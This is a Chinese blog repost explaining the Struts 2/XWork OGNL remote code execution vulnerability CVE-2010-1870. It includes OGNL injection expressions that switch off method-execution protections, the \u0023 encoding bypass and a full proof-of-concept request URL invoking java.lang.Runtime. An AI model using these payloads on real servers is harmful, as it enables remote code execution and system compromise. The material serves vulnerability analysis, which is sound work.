Struts 2命令执行漏洞
来源:互联网 发布:欧元区经济数据 编辑:程序博客网 时间:2024/06/05 02:42
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。
这个漏洞的细节描述公布在exploit-db 上。
在这里简单摘述如下:
XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢?如下:
会被转化成:
- user.address.city=Bishkek&user['favoriteDrink']=kumys
这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。
- action.getUser().getAddress().setCity("Bishkek")
- action.getUser().setFavoriteDrink("kumys")
由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。
- * Method calling: foo()
- * Static method calling: @java.lang.System@exit(1)
- * Constructor calling: new MyClass()
- * Ability to work with context variables: #foo = new MyClass()
- * And more...
但这两个方法可以被覆盖,从而导致代码执行。
- * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true)
- * SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false)
ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。
- #_memberAccess['allowStaticMethodAccess'] = true
- #foo = new java .lang.Boolean("false")
- #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
- #rt = @java.lang.Runtime@getRuntime()
- #rt.exec('mkdir /tmp/PWNED')
可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。
- * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value.
- * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
- * #root
- * #this
- * #_typeResolver
- * #_classResolver
- * #_traceEvaluations
- * #_lastEvaluation
- * #_keepLastEvaluation
最终导致代码执行成功。
- http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den
- yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti
- me()))=1
- Struts 2命令执行漏洞
- Struts 2命令执行漏洞
- PPLIVE源代码泄露及两个struts命令执行漏洞
- Struts S2-016 远程任意命令执行漏洞检测代码
- Apache Struts远程命令执行漏洞、开放式式重定向漏洞
- Struts2命令执行漏洞--(升级struts至struts-2.3.28.1版本)
- OS命令执行漏洞
- Struct2命令执行漏洞
- 命令执行漏洞
- 命令执行漏洞总结
- ImageMagick 命令执行漏洞
- Struts 2 远程代码执行漏洞(CVE-2016-0785)解决方案
- Struts 2 远程代码执行漏洞加固方法
- sap netweaver命令执行漏洞
- 任意命令执行漏洞浅析
- Struts2远程命令执行漏洞
- 关于struts 2为什么会有代码执行漏洞的小帖子
- Struts 2最新0day破坏性漏洞(远程任意代码执行)等的重现方法
- 黑马程序员_2010年Java高新技术
- 给Qt程序添加图标
- 一些有用的JAVA工具
- iOS app支付宝接口调用的一点总结(补充支付宝SDK&Demo下载地址)
- 基于linux服务器的性能分析与优化(一)
- Struts 2命令执行漏洞
- 关于在VS2008和VS2010中禁用及卸载Visual Assist X的方法研究
- Android开发环境搭建全程演示(jdk+eclipse+android sdk)
- 使用LINQ实现对数据库单张表的基础增删改查操作
- GMF中,如何给属性排序
- Linux USB驱动框架分析
- Android UI——popuwindow实例
- printf("%d",5.01)和printf("%f",5)的输出结果
- 关于IO